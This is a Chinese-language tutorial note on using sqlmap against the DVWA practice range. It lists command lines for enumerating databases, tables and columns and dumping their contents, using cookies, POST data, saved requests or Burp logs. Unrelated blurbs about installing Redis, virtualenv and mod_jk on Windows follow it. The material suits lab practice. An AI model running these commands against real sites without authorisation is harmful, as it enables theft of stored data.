sql注入:攻擊者用非法的引數向服務端執行資料,服務端沒有對輸入進行校驗就直接執行了攻擊者輸入的非法操作,從而產生sql注入
在python資料夾中放入sqlmap資料夾 後進入cmd 找到資料夾後執行python sqlmap.py
這裡對dvwa靶場進行操作
cookie,指某些**為了辨別使用者身份、進行 session 跟蹤而儲存在使用者本地終端上的資料
需要登入才能進行操作的**查詢sql注入漏洞。必須獲取到cookie值
或者bp抓包 get型別
有四種型別注入
dump 資料庫中資料表中資料: --dump-all
python sqlmap.py -u "url" --cookie="" --dbs
python sqlmap.py -u "url" --cookie="" --dump
python sqlmap.py -u "url" --cookie="" -talbes 所有資料庫以及裡面的表
python sqlmap.py -u "url" --cookie="" -d 資料庫名 -tables 當前資料庫以及裡面的表
python sqlmap.py -u "url" --cookie="" -d 資料庫名 -t 表名 -columns 爆出字段
python sqlmap.py -u "url" --cookie="" -d 資料庫名 -t 表名 -c 欄位1,欄位2 -dump 爆出字段對應的明文
python sqlmap.py -r 1.txt --dbs
python sqlmap.py -u "" --data="id=1&submit=%e6%9f%a5%e8%af%a2" --dbs --level 3 --risk 3 --batch
或者直接放到txt裡
生成的burp.log和sqlmap.py 放在同一目錄
然後就去抓包
抓包完 log 就記錄了資料
然後開始跑
python sqlmap.py -l burp.log --batch -smart --level 3 --risk 3
總結,有登入介面先,就抓包拿cookie 然後get型別就cookie=「」,post型別就data=「id」,或者直接全部丟到txt裡跑,配合burp的抓包日誌批量跑也可 window下Redis安裝使用
一 redis簡介 redis是乙個開源的,使用c語言編寫,面向 鍵 值 對型別資料的分布式nosql資料庫系統,特點是高效能,持久儲存,適應高併發的應用場景。redis純粹為應用而產生,它是乙個高效能的key value資料庫,並且提供了多種語言的api。redis是乙個支援持久化的記憶體資料庫,...
window下安裝使用virtualenv
window下安裝使用virtualenv 本文為大家介紹的是如何在window下安裝使用virtualenv的方法,感興趣的同學參考下。要在windows用 virtualenv,網上多是在linux下的教程,所以總結了一下.virtualenv zip包本身包括easyinstall和pip包,...
window環境下使用Apache mod jk
1 mod jk是什麼?apache自身是用來載入靜態頁面的,如果要載入動態頁面比如jsp,還要做與tomcat的整合,mod jk就是整合apache2.4與tomcat的聯結器。2 apache tomcat mod jk之間的關係 apache 這裡指的是httpd,web伺服器,用來處理靜態...